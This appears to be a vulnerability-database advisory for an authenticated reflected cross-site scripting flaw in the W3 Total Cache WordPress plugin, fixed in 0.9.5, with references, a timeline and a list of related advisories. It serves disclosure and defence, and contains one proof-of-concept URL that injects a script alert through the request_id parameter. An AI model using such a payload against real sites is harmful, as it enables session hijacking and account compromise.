W3 Total Cache < 0.9.5 – Authenticated Reflected Cross-Site Scripting (XSS) | Plugin Vulnerabilities

Description

The W3 Total Cache WordPress plugin was affected by an Authenticated Reflected Cross-Site Scripting (XSS) security vulnerability.

Proof of Concept

http://www.example.com/wp-admin/admin.php?page=w3tc_support&request_type=bug_report&payment&url=http%3A%2F%2Fexample.com&name=test&email=test%25gmail.com&twitter&phone&subject=test%22+a&description=test&forum_url&wp_login&wp_password&ftp_host&ftp_login&ftp_password&subscribe_releases&subscribe_customer&w3tc_error=support_request&request_id=%22%3E%3Cscript%3Ealert%28%2FXSS%2F%29%3C%2Fscript%3E

Affects Plugins

Fixed in 0.9.5

References

URL

https://blog.zerial.org/seguridad/vulnerabilidad-cross-site-scripting-en-wordpress-w3-total-cache/

URL

https://seclists.org/fulldisclosure/2016/Sep/52

URL

https://sumofpwn.nl/advisory/2016/reflected_cross_site_scripting_vulnerability_in_w3_total_cache_plugin.html

URL

https://seclists.org/fulldisclosure/2016/Nov/63

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

Miscellaneous

Submitter

ethicalhack3r

Submitter twitter

Verified

No

WPVDB ID

ab678c61-7609-4497-82b4-3cbbc84081a2

Timeline

Publicly Published

2016-09-21 (about 9 years ago)

Added

2016-09-22 (about 9 years ago)

Last Updated

2026-04-13 (about 1 month ago)

Other

Published

Title

Published

2022-11-08

Title

WP OAuth Server < 4.2.2 - Admin+ Stored XSS

Published

2023-09-27

Title

RSVPMarker < 10.6.7 - Admin+ Stored XSS

Published

2025-08-27

Title

Beaver Builder Plugin (Lite Version) < 2.9.3.1 - Reflected Cross-Site Scripting

Published

2020-01-25

Title

Multiple Domain < 1.0.3 - XSS in Canonical/Alternate Tags

Published

2025-11-07

Title

HTML Forms < 1.5.6 - Authenticated (Admin+) Stored Cross-Site Scripting